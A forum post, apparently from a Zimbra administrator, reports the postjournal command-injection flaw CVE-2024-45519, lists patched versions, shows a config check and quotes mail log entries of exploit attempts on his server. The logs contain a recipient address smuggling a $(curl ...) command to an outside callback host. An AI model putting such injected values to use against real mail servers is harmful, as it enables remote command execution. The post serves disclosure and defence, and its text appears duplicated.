I mentioned it here too: viewtopic.php?p=314125#p314125 but it deserves its own topic.
There is a vulnerability in Zimbra's postjournal system that allows arbritrary command execution by sending an e-mail to it. Basically you can just put shell code in a recipient. It's being tracked under CVE-2024-45519.
My system does not seem to be running postjournal:
I also can't find any references to postjournal on my system, with 'local', 'aptitude search', etc.
These versions are fixed:
9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46
Exploit attempts have been reported starting September 28th. My own server seems attempts starting oct 1:
The link below says that the source needs to be in 'mynetworks', so the above 'Relay access denied' may mean that it wouldn't have been vulnerable, but I'm not sure.
I don't know if I can see if the curl command was executed on my server. I did just execute it on my PC at home, so now they think they have a catch...
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
https://blog.projectdiscovery.io/zimbra ... execution/
There is a vulnerability in Zimbra's postjournal system that allows arbritrary command execution by sending an e-mail to it. Basically you can just put shell code in a recipient. It's being tracked under CVE-2024-45519.
My system does not seem to be running postjournal:
Code:
sudo -i -u zimbra zmlocalconfig | grep -Fi postjournal_enabledpostjournal_enabled = falsezmcontrol -vRelease 10.1.1.GA.4200000.UBUNTU20.64 UBUNTU20_64 FOSS edition.These versions are fixed:
9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46
Exploit attempts have been reported starting September 28th. My own server seems attempts starting oct 1:
Code:
# cat /var/log/mail.log | grep -F '$('Oct 1 14:03:26 meel postfix/smtpd[2440729]: NOQUEUE: filter: RCPT from unknown[45.41.187.134]: <aaaa@mail.domain.com>: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10026; from=<aaaa@mail.domain.com> to=<"aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)"@mail.domain.com> proto=ESMTP helo=<localhost>Oct 1 14:03:26 meel postfix/smtpd[2440729]: NOQUEUE: filter: RCPT from unknown[45.41.187.134]: <aaaa@mail.domain.com>: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10024; from=<aaaa@mail.domain.com> to=<"aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)"@mail.domain.com> proto=ESMTP helo=<localhost>Oct 1 14:03:26 meel postfix/smtpd[2440729]: NOQUEUE: reject: RCPT from unknown[45.41.187.134]: 554 5.7.1 <aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)@mail.domain.com>: Relay access denied; from=<aaaa@mail.domain.com> to=<"aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)"@mail.domain.com> proto=ESMTP helo=<localhost>I don't know if I can see if the curl command was executed on my server. I did just execute it on my PC at home, so now they think they have a catch...
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
https://blog.projectdiscovery.io/zimbra ... execution/
Statistics: Posted by halfgaar — Wed Oct 02, 2024 9:42 pm